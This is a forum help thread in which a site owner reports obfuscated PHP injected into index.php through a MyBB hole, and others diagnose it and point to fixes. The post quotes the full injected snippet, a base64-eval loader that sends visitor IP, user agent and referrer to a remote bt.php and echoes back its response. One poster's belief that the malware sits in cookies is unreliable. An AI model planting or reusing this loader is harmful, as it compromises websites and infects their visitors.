Site Help

[Ronald_Reagan]

Hey, today pbclan.tk was having some issues. I use PHP for my main site files, this is so I can edit the sidebar easily (I hate frames) by just using one function, and so I can track (easily) who hits what pages. The most major PHP/other script on my website is the forums, which I keep updated. MyBB (same as here).

My problem stemmed from errors like this: (xx ip was from the other site, yy was mine. Obscured so no spider picks these up)

[SELECT ALL] Code:

[12-Oct-2011 15:55:53] PHP Warning:  file_get_contents(http://xx.xxx.xxx.xx/bt.php?ip=yy.yyy.yy.yyy&amp;host=pbclan.tk&amp;uri=%2F&amp;ua=mozilla%2F5.0+%28macintosh%3B+intel+mac+os+x+10_7_1%29+applewebkit%2F535.1+%28khtml%2C+like+gecko%29+chrome%2F14.0.835.202+safari%2F535.1&amp;ref=) [<a href='function.file-get-contents'>function.file-get-contents</a>]: failed to open stream: HTTP request failed! HTTP/1.1 502 Bad Gateway
in /home/pbclan/public_html/index.php on line 44

I looked, and found this on line 44, however I didn't see this till I scrolled over as it was obscured by tons of whitespace (spaces or tabs, I dont recall)

[SELECT ALL] Code:

?><?php $_F=__FILE__;$_X='Pz48P3BocCAkM3JsID0gJ2h0dHA6Ly85Ni42OWUuYTZlLm8wL2J0LnBocCc7ID8+';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));$ua = urlencode(strtolower($_SERVER['HTTP_USER_AGENT']));$ip = $_SERVER['REMOTE_ADDR'];$host = $_SERVER['HTTP_HOST'];$uri = urlencode($_SERVER['REQUEST_URI']);$ref = urlencode($_SERVER['HTTP_REFERER']);$url = $url.'?ip='.$ip.'&host='.$host.'&uri='.$uri.'&ua='.$ua.'&ref='.$ref; $tmp = file_get_contents($url); echo $tmp; ?>

This would obviously throw the error, except how did this get into my file? I never added this in by myself, you can scan the site, there is no user data submission that seems like it could damage anything.
There were three lines like this in here, all removed now.

Thoughts on how this got in here? Google flagged this page as malicious, same with avast.
Should I talk to my host? Should I reexamine my security?

As I mentioned previously, I kept access logs examining who went where on my site. If needbe, I can hand these logs over. Of course, only those who I trust and who can help me.

Update: Got to the forums, now taking the whole site offline.

Update2: Got something similar related to MyBB and the current version: http://community.mybb.com/thread-105752.html

[V-Man]

Not an expert, but here's what I've gathered from teh Interwebs:
http://en.wikipedia.org/wiki/PHP#Security
http://en.wikipedia.org/wiki/Cross-site_scripting
Pay special attention to what the non-contributing code does or seems to be trying to do.

[SKB]

Since there are other cases, it looks like an automated attack. Your MyBB was exploited to modify /index.php (append), but as far as I understand this was targeted at your visitors' browser by pretty much injecting an iframe.

Follow this to fix the issue http://community.mybb.com/thread-105780.html
and also check your other files for unknown/unseen code.

edit: i fail at grammar

---

it exploits java applets (accidentally did testing in non sandboxed browser, way to go SKB)

edit2: About 21,700 results (0.20 seconds) when googling <ip>/bt.php

[tempest]

Ouch. That. Hurts.
Btw, I warmly recommend PHPSecInfo - among others, it helps you identify potentially dangerous features such as remote file_get_contents (allow_url_fopen), many of which are enabled by default in PHP.

[Ronald_Reagan]

Alright, thank you. I think I know more about what problem I was having. It freaked me out as I first noticed it on my main page /index.php rather than the the forum /forum/index.php

I already did the MyBB fix (check my second edit). Tempest, I will check that out. Thank you :)

It freaked me out as I had no idea what was happening :>

If you visited the site, you may have gotten some malware on your computer. From what I hear, it is stored in the cookies, so clear your cache and cookies and you should be good.

[Ronald_Reagan]

Ok, site is back up. (double post yay!)

I found it was targeting all index.php files on my filesystem. It also targeted MyBB specific files. I suggest to all MyBB forum admins to fix the vulnerability that is talked about on this page: http://blog.mybb.com/2011/10/06/1-6-4-se...nerabilit/

I know this means these forums, and at least TyD's.
* Ronald_Reagan forgets about other forums softwares.

Seems to me that maybe oNe uses MyBB? :>

Anyways, I cleaned all the files that I saw were modified. Search for all index.php files on your system and make sure you cleaned those. Also, search for a portion of the above script to make sure no other files have it.